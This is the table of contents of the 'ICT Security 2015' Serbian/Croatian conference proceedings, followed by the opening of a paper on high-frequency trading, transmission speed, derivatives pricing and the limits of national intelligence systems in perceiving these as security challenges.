ict securiy 2015 - iafaa · 2019. 3. 13. · ict securiy 2015 ikt bezbednost 2015 zbornik radova...

ICT Securiy 2015

IKT BEZBEDNOST 2015

Zbornik radova

Kladovo, 2015. godine

5

S A D R Ž A J

dr Dragan Ž. Đurđević, profesor; Miroslav D. Stevanović

UTICAJ BRZINE, KAO ODLIKE INFORMACIONOG DOBA, NA KAPACITET PERCEPCIJE BEZBEDNOSNOG IZAZOVA VISOKO FREKVENTNE TRGOVINE

1. U V O D ............................................................................................................................................ 12 2. BRZINA TRANSMISIJE, KAO FAKTOR VISOKOFREKVENTNE TRGOVINE ..................... 12 3. NETRANSPARENTNOST, KAO UZROK RIZIKA VISOKOFREKVENTNE TRGOVINE ....... 13 4. RAČUNARSKI I HUMANI MULTITASKING KAO POSLEDICA PRIMENE INFORMACIONIH TEHNOLOGIJA .............................................................................................. 14 5. POSLEDICE INFORMACIONOG DOBA NA DRUŠTVENU ORGANIZACIJU ........................ 15 6. PROBLEM PERCEPCIJE BEZBEDNOSNIH IZAZOVA INFORMACIONIH TEHNOLOGIJA 16 7. ZAKLJUČAK ................................................................................................................................... 17 LITERATURA .................................................................................................................................. 18

dr Viktor Kanižai OTKRIVANJE I RAZJAŠNJAVANJE VANREDNIH IT

BEZBEDNOSNIH DOGAĐAJA U BANCI

1. U V O D ............................................................................................................................................ 22 2. POJAM INCIDENTA I VANREDNOG DOGAĐAJA .................................................................... 22

2.1. IZVORI SAZNANJA ................................................................................................................ 22 2.2. FAKTORI RIZIKA ................................................................................................................... 22

3. UPRAVLJANJE INCIDENTIMA .................................................................................................... 23 4. INTERNE PROVERE ....................................................................................................................... 23

4.1. ZNAČAJ I CILJ INTERNIH PROVERA ................................................................................. 23 4.2. DOKUMENTOVANJE SPROVEDENIH ISTRAGA ............................................................. 24 4.3. OBEZBEĐIVANJE DOKAZA ................................................................................................. 24

5. ALATI DIGITALNE FORENZIKE ................................................................................................. 25 6. ZAKLJUČAK ................................................................................................................................... 26 LITERATURA .................................................................................................................................. 27

Mr.sc , Gorjan Damjanović; Mr.sc; Ilhan Muratović; Mr.sc; Alma Damjanović IT SECURITY IN GOVERNMENT

AND INTERGOVERNMENTAL ORGANIZATION

Abstract (Introduction) .......................................................................................................................... 29 Difference between Business and Private use of the Internet and Introduction to a Local Network ....................................................................................... 29 External threats ...................................................................................................................................... 30 Internal threats: ...................................................................................................................................... 30 Resources required for the safe operation and the Internet use ............................................................. 30

Material resources ............................................................................................................................ 30

6

Human resources .............................................................................................................................. 30 Material resources and expectations ................................................................................................ 31 Human resources and expectations .................................................................................................. 31

Sub factor: IT managers ........................................................................................................................ 31 Basic methods of protection and safeguarding ...................................................................................... 32 Conclusion ............................................................................................................................................. 32 References: ............................................................................................................................................ 33

MBA, Danijel Bara; mr.sc. Sanja Ćorić; dipl.oecc, Goran Jurišić THE ROLE OF CYBER UNSURANCE IN MANAGING

AND MITIGATING CYBER SECURITY RISK

WITH SPECIAL EMPHASIS ON THE POTENTIAL OF CROATIA AND SERBIA CYBER INSURANCE MARKET ............................................................................... 35 PREFACE ............................................................................................................................................. 35 CYBER-INCIDENTS AND THEIR IMPACTS ................................................................................... 36 CYBER THREATS IN CROATIA AND SERBIA .............................................................................. 37 CYBER RISK ....................................................................................................................................... 38 CYBER INSURANCE .......................................................................................................................... 39 CONCLUSION ..................................................................................................................................... 42 LITERATURE ...................................................................................................................................... 43

Zoran Vasić, PhD, main tax advisеr NEOPHODNOST ZAŠTITE PODATAKA

KOJIMA RASPOLAŽU PORESKE ADMINISTRACIJE

UVOD ................................................................................................................................................... 47 1. PODACI KOJIMA RASPOLAŽU PORESKE ADMINISTRACIJE .............................................. 47

1.1. Materijalni resursi ..................................................................................................................... 49 1.2. Ljudski resursi ........................................................................................................................... 49 1.3.Poreski obveznici ....................................................................................................................... 49

2. Informacije od javnog značaja .......................................................................................................... 50 3. Poreski postupak i poreska administracija ........................................................................................ 51

3.1. Organizacija i način rada ........................................................................................................... 51 3.2. Dostupnost datotekama koje se vode u poreskim administracijama ......................................... 53 3.3. Čuvanje službene tajne u poreskom postupku .......................................................................... 53

4. Prelazak sa papirnog na elektronsko poslovanje ............................................................................... 53 5. Zaštita podataka i prenosa podataka .................................................................................................. 54 Zaključak .......................................................................................................................................... 54

dr.sc. Zdenko Adelsberger IMPLEMENTACIJA ISO/IEC 27001

PREMA REVIZIJI 2013

1. UVOD ............................................................................................................................................... 56 2. USPOREDBA ISO/IEC 27001 IZ 2013 I 2005 GODINE ................................................................ 56

7

3. ZNAČAJKE IMPLEMENTACIJE ISMS-a PREMA ISO/IEC 27001:2013 ................................... 58 4. Projekt implementacije ISMS-a prema ISO/IEC 27001:2013 ......................................................... 61 5. ZAKLJUČAK ................................................................................................................................... 62 LITERATURA .................................................................................................................................. 63

Mane Piperevski, Master of Science; Filip Simeonov, Bachelor of Science HACKER ATTACKS

Undetectable Attacks from Trojans with Reverse Communication ...................................................... 65 Introduction ........................................................................................................................................... 65 Basic Trojan characteristics ................................................................................................................... 65

Trojan definition ............................................................................................................................... 65 Trojans Communication channels ................................................................................................... 66 Trojan targets ................................................................................................................................... 66

Trojan Construction ............................................................................................................................... 66 Creating “shellcode” ........................................................................................................................ 67 Techniques for Trojan camouflage .................................................................................................. 67

Scenarios for Trojan hacking attacks .................................................................................................... 68 Generating "Shell Code" .................................................................................................................. 68 Encryption of previous step generated "ShellCode" ........................................................................ 68 Preparing to capture reverse communication ................................................................................... 70 Bypassing Windows Security User Access Control – UAC ............................................................ 70

Used literature .................................................................................................................................. 70

Dr Dragana Ćamilović OTKRIVANJE PREVARA POMOĆU DATA MINING-A

1. UVOD ............................................................................................................................................... 71 2. DATA MINING ................................................................................................................................ 72 3. DATA MINING TEHNIKE I METODE .......................................................................................... 73 4. KORIŠĆENJE DATA MINING-A ZA OTKRIVANJE PREVARA U PRAKSI ............................ 75 5. ZAKLJUČAK ................................................................................................................................... 77 LITERATURA .................................................................................................................................. 78

MSc EE, C|EH Darko Mihajlovski; MSc PM, Kiril Buhov; MSc.B, Jani Nikolov IMPLEMENTATION OF TRANSPARENT DATA ENCRYPTION (TDE)

AND ADDITIONAL COMPENSATIONAL CONTROLS AS ALTERTATIVE METHOD REGARDING ENCRYPTION OF PAN NUMBERS IN MICROSOFT SQL DATABASE

(PCI DSS V3.0, SECTION 3.4)

1. INTRODUCTION ............................................................................................................................. 79 2. PCI AND THE ART OF THE COMPENSATING CONTROL ...................................................... 80

2.1. WHERE ARE COMPENSATING CONTROLS IN PCI DSS? ............................................... 80 2.2. WHAT A COMPENSATING CONTROL IS NOT ................................................................. 81 2.3. HOW TO CREATE GOOD COMPENSATING CONTROL .................................................. 82

8

3. APPROACH TO THE PROBLEM ................................................................................................... 82 4. SQL SERVER 2008 TRANSPARENT DATA ENCRYPTION OFFERS FULL DATA ENCRYPTION ........................................................................................... 83

4.1 USING MANUAL KEY MANAGEMENT .............................................................................. 83 LITERATURA ........................................................................................................................... 85

Prof. dr Igor Pejović SPECIFIČNE VRSTE SAJBER KRIMINALA – CARD SKIMMING

UVOD ................................................................................................................................................... 88 ŠTA JE SKIMMING I KAKO FUNKCIONIŠE? ........................................................................... 88 SKIMMING SA STANOVIŠTA KORISNIKA .............................................................................. 90 SKIMMING SA STANOVIŠTA BANAKA ................................................................................... 91

ZAKLJUČAK ....................................................................................................................................... 93 Reference: ......................................................................................................................................... 94

Matea Naglić, mag.ing.log.; doc.dr.sc. Edvard Tijan; dr.sc. Saša Aksentijević POSLOVNI INFORMACIJSKI SUSTAVI

KONTEJNERSKIH TERMINALA

1. UVOD ............................................................................................................................................... 95 2. TEORIJSKE OSNOVE POSLOVNIH INFORMACIJSKIH SUSTAVA ........................................ 96

2.1. FUNKCIJA POSLOVNIH INFORMACIJSKIH SUSTAVA .................................................. 98 2.2. ORGANIZACIJSKI POGLED NA POSLOVNE INFORMACIJSKE SUSTAVE ................. 99 2.2.1. Transakcijski informacijski sustav .................................................................................. 99 2.2.2 Upravljački informacijski sustav .................................................................................... 100 2.2.3. Sustav za potporu odlučivanju ...................................................................................... 100

3. INFORMACIJSKI SUSTAVI LUKA I TERMINALA .................................................................. 101 3.1. ULOGA INFORMACIJSKIH TEHNOLOGIJA U PROMJENI LOGISTIKE USLUGA U LUKAMA ............................................................ 103 3.1.1. Uvjeti primjene informacijskih tehnologija u luci ........................................................ 103 3.1.2. Integralni lučki informacijski sustav (Port Community system) ................................... 103 3.1.3. Sadržaj podataka u bazi i pristup podacima .................................................................. 104 3.2. VAŽNOST INFORMACIJSKE SIGURNOSTI I PRIMJENE ISO STANDARDA .............. 105 3.2.1. PKI (Public Key Infrastructure) .................................................................................... 106 3.3. PREDNOSTI KORIŠTENJA INFORMACIJSKOG SUSTAVA U LUČKOM POSLOVANJU ............................................................................. 106

4. PRIMJENA INTELIGENTNIH SUSTAVA NA KONTEJNERSKOM TERMINALU ................ 107 4.1. INFORMACIJSKI I KOMINIKACIJSKI ASPECT INTELIGENTNIH TRANSPORTNIH SUSTAVA NA KONTEJNERSKOM TERMINALU ............................. 108 4.2. SUSTAVI ZA UPRAVLJANJE KONTEJNERSKIM TERMINALIMA .............................. 110 4.3. VIRTUALNA LOGISTIKA NA KONTEJNERSKIM TERMINALIMA ............................. 112

5. ZAKLJUČAK ................................................................................................................................. 113 LITERATURA ................................................................................................................................ 114

9

Klara Meštrović, mag.ing.log.; dr.sc. Saša Aksentijević; doc.dr.sc. Edvard Tijan MODELIRANJE PROCESA PRI IZGRADNJI POSLOVNIH INFORMACIJSKIH SUSTAVA

1. UVOD ............................................................................................................................................. 115 2. TEMELJNE ZNAČAJKE POSLOVNIH PROCESA ..................................................................... 116

2.1. UPRAVLJANJE POSLOVNIM PROCESIMA ..................................................................... 118 2.2. FAZE UPRAVLJANJA POSLOVNIM PROCESIMA .......................................................... 119 2.3. SUSTAV ZA UPRAVLJANJE POSLOVNIM PROCESIMA ............................................... 120

3. MODELIRANJE POSLOVNIH PROCESA ................................................................................. 121 3.1. METODE MODELIRANJA POSLOVNIH PROCESA ........................................................ 122 3.2.. NAČELA I PRISTUPI MODELIRANJU POSLOVNIH PROCESA ................................... 130 3.3. ALATI ZA MODELIRANJE POSLOVNIH PROCESA ....................................................... 131 3.3.1. Programski alati za modeliranje i analizu poslovnih procesa ....................................... 131 3.3.2. Programski alati za upravljanje poslovnim procesima .................................................. 132

4. POBOLJŠANJE I REINŽENJERING POSLOVNIH PROCESA .................................................. 132 4.1. POBOLJŠANJE POSLOVNIH PROCESA ............................................................................ 132 4.1.1. Metoda šest sigma - 6σ ................................................................................................. 133 4.1.2. Integralni informacijski sustavi .................................................................................... 134 4.2. REINŽENJERING POSLOVNIH PROCESA ....................................................................... 134 4.3. ODNOS I RAZLIKE IZMEĐU POBOLJŠANJA POSLOVNIH PROCESA I REINŽENJERINGA POSLOVNIH PROCESA .................................................................. 135

5. ZAKLJUČAK ................................................................................................................................. 136 LITERATURA ................................................................................................................................ 138

Jasmina Trajkovski; Ana Meskovska

RISK BASED BALANCING OF ORGANIZATIONAL AND TECHNICAL CONTROLS FOR LEVERAGING EFFECTIVENESS OF INFORMATION SECURITY

1. INTRODUCTION ......................................................................................................................... 142 2. IMPORTANCE OF BALANCING INFORMATION SECURITY CONTROLS ........................ 143 3. RISK BASED APPROACH FOR INFORMATION SECURITY ................................................ 144 4. RISK BASED BALANCING OF ORGANIZATIONAL AND TECHNICAL CONTROLS FOR ENHANCED INFORMATION SECURITY ................................................... 145 5. CONCLUSION .............................................................................................................................. 146 REFERENCES ................................................................................................................................ 147

11

UTICAJ BRZINE, KAO ODLIKE INFORMACIONOG DOBA, NA KAPACITET PERCEPCIJE BEZBEDNOSNOG IZAZOVA

VISOKO FREKVENTNE TRGOVINE

THE IMPACT OF SPEED, AS A CHARACTERISTIC OF

INFORMATION AGE, ON THE CAPACITY FOR PERCEPTION OF SECURITY CHALENGE OF HIGH FREQUENCY TRADING.

dr Dragan Ž. Đurđević, profesor1

Miroslav D. Stevanović2

Sadržaj: Najveći generator kapitala na globalnom finansijskom tržištu je računarska visokofrekventna trgovina derivativima. Ove finansijske operacije počivaju na: korišćenju informacionih tehnologija, brzim komunikacijama, apstraktnim matematičkim formulama, neprilago- đenosti nacionalnih pravnih poredaka potrebama informacionog doba i birokratizaciji nacionalnih organizacionih modela.

U osnovi visokofrekventne trgovine ne postoji realna ekonomska vrednost, već finansijski derivativi. Kao sredstvo obrta apstraktnog novca, koji desetostruko nadilazi vrednost svetskog bruto proizvoda, visokofrekventna trgovina predstavlja i izazov za ekonomsku stabilnost država.

Cilj ovog rada je da se analizira uticaj brzine i multitaskinga, kao odlika informacionih tehnologija, na smanjen kapacitet nacionalnih obaveštajno-bezbednosnih sistema da percipiraju visokofrekventnu trgovinu kao bezbednosni izazov.

Ključne reči: visokofrekventna trgovina, multitasking, finansijski derivativi, obaveštajni sistem

Abstract: The largest generator of capital in the global financial market is the computerised high-frequency derivatives trading. These financial operations are based on: the use of information technologies, fast communications, abstract mathematical formulas, maladj- ustment of national legal systems to the needs of the information age and the bureaucra- tization of national organizational models.

In the basis of high-frequency tradig is no real economic value, but - financial derivatives. As a means of rapid turnover of abstract money, which has reached tenfold the value of gross world product, high-frequency trading poses a challenge to the economic stability of the country.

The aim of this article is to analyze the consequences of speed and multitasking, as the characteristics of information technology, on the lack of capacity of national intelligence systems to perceive high-frequency trading as a security challenge.

Keywords: high-frequency trading, multitasking, financial derivatives, intelligence system 1 Akademija za nacionalnu bezbednost, Kraljice Ane bb, [email protected] 2 Bezbednosno-informativna agencija, Kraljice Ane bb, [email protected]

Uticaj brzine, kao odlike informacionog doba, na kapacitet percepcije bezbednosnog izazova vidoko frekventne trgovine

Zbornik radova Dragan Đurđevič, Miroslav Stevanović

12

1. U V O D

Danas, komunikacione kompanije sve više postavljaju mrežnu opremu blizu sedišta vladinih ustanova, a neki berzanski trejderi dobijaju izveštaje neposredno od administracija država, umesto da podaci prvo budu objavljeni u javnim finansijskim medijima. Ovi detalji se ne doživljavaju kao indikator dublje promene, koja predstavlja izazov za nacionalnu bezbednost. Percepcija bezbednosnih pretnji u sektoru informacionih tehnologija svodi se uglavnom na kompjuterski kriminal, kiber-terorizam i pranje novca. Kao pretnja globalnoj bezbednosti i nacionalnoj bezbednosti država najčešće se apostrofira kiber-terorizam. Ova vrsta pretnji potiče od nesistemskog korišćenja informacionih tehnologija (egzotične pretnje) za prodor i podrivanja globalne ili nacionalne funkcije informacionih mreža. Kao takve se navo- de: ad hoc mreže, senzorske mreže, mreže otporne na odlaganje [1], hvatanje i slušanje informacija koje se konstantno i nenamerno emituju unutar elektronskog uređaja [2]. Neki autori smatraju da su egzotične pretnje, pojam koji je teško odrediti i da je rizik od njih preuveličan [3]. Čini se da kiber-terorizam, kako god da se shvati njegova sadržina i opasnost, obuhvata pretnje koje primena informacionih tehnologija može da izazove po informativne operacije, odnosno nacionalne informacione sisteme [4].

U navedenom kontekstu, postavlja se pitanje percepcije ove vrste izazova za nacionalne države u okviru globalnih sistema, poput finansijskog. Naime, analiza problema sa kojima se suočava IT sektor u suzbijanju pranja novca ukazuje da su nacionalni obaveštajni, pravni i knjigovodstveni sistemi, pod uticajem globalizacije, postali instrumentalizovani u sistemu globalnih finansija i da se razvijaju kao preobimni birokratizovani sistemi koji one- mogućavaju smisaono tumačenje pokazatelja. Ukoliko izazov potiče od nepercipiranog i neinkriminisanog izazova, administracije ne mogu da deluju racionalno ukoliko ne ostvare kontrole rizičnih sektora. Stoga, u informacionom dobu, uspešnost države zavisi od istra- živanja i analize faktora rizika, što uz obaveštajni rad, počiva i na racionalnoj primeni informacionih tehniologija [5].

2. BRZINA TRANSMISIJE, KAO FAKTOR VISOKOFREKVENTNE TRGOVINE

Brz prenos signala može se vršiti putem različitih veza, zavisno od potreba. Bakarni vodovi su upotrebljivi na kratkim razdaljinama, ali su na većim distancama inferiorni u odnosu na optička vlakna, zbog manje funkcionalnosti i pojasnog (propusnog) opsega. Mikrota- lasne mreže (i milimetarski talasi visoke frekvencije) nemaju veliki propusni opseg, ali se postavljaju namenski i, otuda, najkraćom distancom, čime im se smanjuje latencija u odnosu na preraširene i uglavnom prezagušene optičke mreže. Laserske mreže imaju sve prednosti kao i mikrotalasne, ali i veći propusni opseg, kao i opciju da su, uz optičke adaptacije, otporne na vremenske uticaje.

Visoko frekventnu trgovinu Njujorške berze (NYSE) omogućava mikrotalasni primarni relej njenog računskog centra. Uprkos tome što Trezor SAD ocenjuje visoko frekventnu trgovinu (HFT) kao „ključni izvor operativnog rizika širom svih tržišta“ [6], nakon što je 2014. godine uspostavljena laserska veza između londonske i frankfurtske berze, febru-



13

ara 2015. godine na relej NYSE je dograđen uređaj [7], koji bi trebalo da dodatno podstakne HFT u SAD.

Taj podsticaj trebalo bi da pruži laserska veza između NYSE i Automatizovanih ko- tacija Nacionalnog udruženja dilera hartija od vrednosti (NASDAQ), koja bi trebalo da omogući bržu transmisiju od postojećih, zasnovanih na mikrotalasima i optičkim kablovima. Lasersko povezivanje između vodećih berzi izvela je kompanija „Anova“, koja ugrađuje opremu firme „Aoptix“, proizvođača sistema za komunikaciju zemlja – vazduhoplov za potrebe američke armije. Prema tehničkoj specifikaciji „Aoptix“, bazna stanica ovog sistema predstavlja uvod u 5G tehnologiju. Ona ima kapacitet dostupnosti nosioca (carrier-grade availability) 99.999% na razdaljini od 10 kilometara. Brzina veze iznosi oko 2Gb/s, što nije veliko u odnosu na standarde fiber-optike, ali je dovoljno za prenos nekoliko hiljada trgovina u sekundi [8].

Postojeća mikrotalasna mreža između Čikaga (berza fjučersa i opcija) i Njujorka (NYSE i NASDAQ), dužine 1280 kilometara u pravoj liniji, ima latenciju od oko 15 ms [9]. Proporcionalno, na oko 58 km udaljenosti između NYSE i NASDAQ, latencija bi trebalo da iznosi ≤ 0,7 ms. Kako transmisija mikrotalasima kroz vazduh putuje blizu brzine svetlosti, na 58 km razdaljine nisu moguća drastična poboljšanja, iz čega proističe da na tržištu HFT prednost predstavlja čak i nekoliko nanosekundi. Činjenica da te nepojmljivo male vremenske uštede mogu da obezbede dobit, indikator je stanja na berzama, na kojima se posredstvom HFT stvara novac ni iz čega [10].

3. NETRANSPARENTNOST, KAO UZROK RIZIKA VISOKOFREKVENTNE TRGOVINE

Danas je računarsko poslovanje središte globalnih finansija i odlučujuće deluje na kapacitet moći u međunarodnim ekonomskim odnosima. Sve države prinuđene su da svoju privrednu aktivnost i razvoj podvrgnu nivou pristupa investicionom kapitalu, koji kontrolišu nosioci računarskog finansijskog poslovanja. Ove operacije zasnivaju se na matematičkim formulama, bez uporišta u realnoj ekonomiji, te ih je zato teško razlikovati od kompjuterskih prevara (Ponzie schemes).

Okvir za obračun vrednosti opcija [11], kao derivativnog finansijskog instrumenta, je Blek-Šolsova diferencijalna jednačina. Racionalizacija određivanja cene nedospelog ugovora omogućila je sve kompleksnije finansijske operacije, što je preraslo u ogromnu globalnu industriju. Rizik ovakvog poslovanja eskalirao je 2007. godine, kada se ispostavilo da međunarodni finansijski sistem, računarski obrće sumu deset puta veću od vrednosti svetskog bruto proizvoda, na osnovu naduvanih vrednosti nepokretnosti, što je proizvelo „usisavanje“ raspoloživog realnog novca.

Ova jednačina omogućila je, mehanizam da se trguje instrumentima čija se vrednost zasniva na nedospelim obavezama (finansijskim derivativima) [12], a posredno da i derivativi postanu imovina, kojom se može trgovati suo ipso. Suština njene vrednosti je da obezbeđuje sistemski način da se opcijom može trgovati u svako doba. Vodeći subjekti međunarodnog finansijskog sistema su, koristeći ekskluzivnu dostupnost naprednih informacionih tehnologija, došli u poziciju globalne finansijske dominacije. Da bi se primat održao, uvode se sve apstra- ktnije finansijske operacije, za čiju racionalizaciju se angažuju vrhunski matematičari i fizičari. Te kalkulacije zasnivaju se na matematičkim formulama i služe za računarski promet, te zanemaruju promene uslova na tržištu [13]. Način da se ostvari zarada jeste da se kupi deri- vativ koji će se prodavati po sve višoj ceni. Procenjuje se da do 90% trgovaca opcijama izgube



14

novac [14]. Kada je, 2007. godine, kulminirala nenaplativost hipoteka u podlozi, izgubile su i vodeće svetske banke. Tada su, vodeće države, u kojima je njihovo sedište, nacionalizovale gubitke privatnih banaka, parama poreskih obveznika. Posledica za ostale države bila je nemo- gućnost da prikupe sredstava na finansijskom tržištu, izdavanjem državnih hartija od vrednosti.

Blek-Šolsovom jednačinom izračunava se preporučena cena opcije, na osnovu četiri veličine, od kojih se mogu kvantifikovati tri: vreme, vrednost imovine u podlozi i teorijska kamata (kamata bez rizika). Četvrta veličina, stabilnost imovine, koja izražava nivo mogućih promena na tržištu nije kvantitativno odrediva, već je spekulativna, pri čemu njena nepromenljivost predstavlja nužan uslov važenja jednačine. Ideja se zasniva na ekonomskoj tezi da se berza može oblikovati slučajnim procesom, opisanom parcijalnom diferencijalnom jedna- činom, koja dinamiku promene cene izražava na osnovu dinamika po kojima se menjaju razne druge veličine (Braunovo geometrijsko kretanje). Tako je, na apstraktan način, omogućeno da se u finansijskom sektoru razvijaju druge jednačine i modeli za sve spekulativnije operacije. Posledice, kako se ispostavilo, snose građani i države, prinuđene da se zadužuju na finansijskom tržištu.

Svaki model stvarnosti zasniva se na uprošćavanju i pretpostavkama. Blek-Šolsova jednačina polazi od proizvoljnog shvatanja cene i nepromenljivosti otklona i rizika, što može da koristi u teoriji finansija, ali ne važi za realna tržišta. Uz to, apstrahuje transakcijske tro- škove i pretpostavlja neograničenost dostupnosti novca i mogućnosti prodaje bez stvarnog posedovanja (šort seling). Naknadni algoritmi, jednofaktorskog i dvofaktorskog modeliranja, razvijaju nove formule za računarski promet finansijskih derivativa, i dalje spekulativno. Rezultat je da tržište derivativa ostaje zavisno od stalnog rasta vrednosti imovine u podlozi, ili od državne zaštite.

4. RAČUNARSKI I HUMANI MULTITASKING KAO POSLEDICA PRIMENE INFORMACIONIH TEHNOLOGIJA

Informacione tehnologije imaju kapacitet obavljanja više radnih aktivnosti istovremeno (multitasking). Multitasking predstavlja uvođenje vremenske komponente u multipro- gramiranje, tako što računar izvodi procese sa preklapanjem, bez svesti operatera [15]. U praksi, aplikativni softver obuhvata sve informatičke alate za pomoć korisnicima računara u izvršavanju zadataka (ne nužno i za rešavanje problema), a operativni sistem je automatski posrednik između programa korisnika i hardvera računara. Bezbednost informacija obuhvata i bezbednost operativnih sistema, te podrazumeva, između ostalog, saradnju programa sa ope- rativnim sistemom, kao i računarski multitasking. Operativni sistem računara može da procesira zahteve korisnika u prvom planu, dok se istovremeno odvijaju druge operacije u poza- dini. Računarski multitasking obuhvata: deobu istog resursa za obradu više poslova; ra- spoređivanje vremena za izvršenje jednog posla; red čekanja na izvršenje, sa prioritetom; i privid paralelizma [16].

Mogućnost računarskog multitaskinga dovela je do utiska da je i za individuu moguće da više ciljeva budu paralelni prioriteti. Međutim, ljudsko biće ne može istovremeno da se koncentriše na izvršavanje dva posla, odnosno da se brzo prefokusira sa jednog cilja na drugi. Utvrđeno je da je prosečnoj osobi, nakon što proveri novu elektronsku poštu, potrebno 64 sekunde da efektivno nastavi rad na prethodnom cilju [17]. Ovaj prekid u performansi mozga prilikom suočavanja sa takvom tranzicijom u psihologiji se naziva cena isključenja. Kod ljudskih bića, izbegavanje multitaskinga sprečava gubitak vremena u realizaciji ciljeva [18].



15

Postizanje boljih rezultata vodi obavljanje posla kvalitetnije i stručnije, odnosno na najbolji mogući način. Opredeljenje za prioritet usmerava ponašanje, tako što nameće organizaciju oko odgovornosti, a cilj drži organizaciju rada individue i omogućava fokusiranje, jer eliminiše dileme šta je potrebno, hitno i važno raditi [19]. U eri informacionih tehnologija, upravljanje ljudskim resursima i organizacija sistema trebalo bi da budu usmereni na prev- azilaženje ove prepreke ciljnoj efikasnosti. Međutim, širenje njihove primene dovelo je do razvoja kodeksa da se kao smisaoni rad smatra zauzetost i iscrpljivanje. Posledica je, da smi- sao rada često ne proističe iz doprinosa nečega što ima vrednost [20]. U delovanju stručnjaka visokog profila i onih koji rade najvrednije poslove uočena je izražena volja da se odbaci svaka distrakcija. Shodno tome, odlika uspešnog nosioca rada je volja, da se održi optimalan nivo posvećenosti i usmerenja.

5. POSLEDICE INFORMACIONOG DOBA NA DRUŠTVENU ORGANIZACIJU

Informaciono društvo uvodi niz osobenosti: centralnu uloga informacionih tehnologija u proizvodnji i širenju informacija; značaj informacije i kreativnog znanja; upotrebu informacionih mreža za distribuiranje informacija; radikalne promene u životu pojedinca kao posledica integracije informacionih tehnologija u sve sfere života; neophodnost sticanja potrebnih iskustva i veština i pristupa bankama informacija. U informacionom društvu, najvažnije aktivnosti postaju stvaranje, distribucija i manipulacija informacijama [21].

Praktične posledice brzine informacionih tehnologija su njihova prijemčivost i dru- štvena strukturna jednakost - rekurzivnost. S jedne strane, one uslovljavaju promene u organizaciji društva, a s druge, porast moći pojedinca. U cilju racionalizacije obrade informacija i odluka, lojalnost izvršilaca se pomera od funkcionera ka funkciji, a posledice toga su deperso- nalizacija poslova i težnja ka efikasnosti. Otuda, informaciono doba odlikuje izrastanje birokratije u dominantnu društvenu strukturu. U središtu novih modela organizacije je „vebe- rijanska“ birokratija [22], zasnovana na strogoj hijerarhijskoj kontroli i stoga neprilagodljiva situacijama koje iziskuju disperziju vlasti. Suprotnost i izazov takvom modelu predstavlja glo- balna mreža, koja takođe počiva na visokoj tehnologiji, ali nije centralizovana. Tako, dolazi do dominacije nacionalnih birokratija u pitanjima strateškog usmerenja, nasuprot individua- lnom pristupu globalnoj i lokalnoj situacionoj svesti, odnosno - do paralelizma znanja.

Birokratije ostaju privržene ustaljenim procedurama, što ih vodi u potrebu za centra- lizovanim odlučivanjem i decentralizovanim sprovođenjem, što je u suprotnosti kibernetskim načelima, po kojima efikasan sistem kumulativno odlikuju: balans (decentralizovanost), cirkularnost (dvosmernost komunikacija), samoregulisanje (sposobnost ispravljanja odluka) i kontrola (centar odlučivanja) [23]. Za razliku od modernog društva, koje počiva na energiji, pokreće ga plaćeni rad, kontroliše birokratija, a dominantne veštine su prisustvo, centraliza- cija i efikasnost, u postmodernom društvu organizacija počiva na računarima, pokretač su informacije, kontrolišu ga protokoli, a dominantne veštine postaju vernost, obrasci i algoritmi [24]. Vizije o mogućoj digitalnoj demokratiji postmodernog doba, negiraju nalazi da, u ko- mpleksnom društvu, digitalni mediji ubrzavaju deliberalizaciju, umanjuju obzir za političku reprezentativnost, podstiču populizam, uvećavaju informativnu nejednakost i ne podstiču političku motivaciju građana [25].

Informacione tehnologije su, po nastanku i funkciji, strateška tehnološka inicijativa koja pruža mogućnost za inovacije, uključujući i pretnje. Pogonska sila iza promena koje nosi



16

informaciono doba je korisnost tehnologija, kao unapređenog oblika ratovanja, u vidu mo- gućnosti fleksibilnijeg organizovanja pojedinaca na mreži i imanentnog rizika umreženih ra- čunara [26]. Otuda, nosioci izazova po nacionalnu bezbednost postaju višedimenzioni: države, subjekti iza kojih su prikrivene države i mreže [27]. Bezbednosna implikacija je pomeranje cilja ka odvraćanju. Shodno tome, u suočavanju sa izazovima po nacionalnu bezbednost HFT-a prioritet je preventivna efikasnost. To podrazumeva institucionalnu i operativnu usklađenost i angažovanost organa i institucija države, kojima se onemogućavaju formalno legitimne aktivnosti koje predstavljaju bezbednosni izazov. To iziskuje adekvatnu usredsređenost, koja omogućuje da delatnost koja predstavlja izazov za nacionalnu bezbednost bude pravovremeno prepoznata [28]. Nedostatak svesti o novim potencijalnim rizicima, nameće potrebu za institucionalnom mrežom koja bi delovala na planu osposobljavanja za nove tehnologije i za percepciju rizika [29]. Mreže mogu biti delotvorne za razmenu informacija, ali i da propuste ili pogrešno obrade neke oblike informacija, što potom kompromituje njihovu efikasnost. U kvalitativnom smislu, postoji raskorak između unutrašnje dinamike mreža koje se koriste u obavljanju bezbednosnih poslova u odnosu na njihovu efikasnost [30].

U današnje vreme, bremenito novim vrstama i pojavnim oblicima pretnji i izazova, nastojanje da se one smanje, nosiocu poslova omogućava kontrolu nad izborom opcija, kako bi vreme, energiju i napore kanalisao tako da ostvari optimalan doprinos u realizaciji ciljeva i aktivnostima od relevantnog značaja. Nakon analiza okolnosti terorističke akcije u Njujorku 2001. godine, spoznaja neracionalnosti trošenja energije na stvari nad kojima se nema kontrola, dupliranje poslova i međusobnih i međuresornih sukoba dovela je do uvođenja metoda kretanja primarnih informacija u informatizovanom sistemu bezbednosti zasnovanog na kancelariji porekla (Office of origin), koja se primenjuje u američkom Federalnom istra- žnom birou (FBI) [31].

6. PROBLEM PERCEPCIJE BEZBEDNOSNIH IZAZOVA INFORMACIONIH TEHNOLOGIJA

Percepcija bezbednosnog izazova HFT, odnosno prometa finansijskih derivativa, za koji u nacionalnom zakonodavstvu nisu zaprećene sankcije, predstavlja suštinski problem. Da bi se došlo do percepcije, neophodno je neposredni objekat ugrožavanja, svesti na problem funkcionisanja posebnog informacionog sistema. Tako bi privredni sistem države obuhvatao međupovezana institucionalna rešenja, mere, instrumente i mehanizme koja determinišu me- đusobne odnose privrednih subjekata proizvodnje, raspodele, razmene i potrošnje. U tom smislu, tranzicioni privredni sistem, kao specifičan privredni sistem, podrazumeva ostvarivanje liberalizacije, makroekonomske stabilnosti, restrukturiranja i privatizacije, kao i promene u političkom sistemu, kao determinante [32].

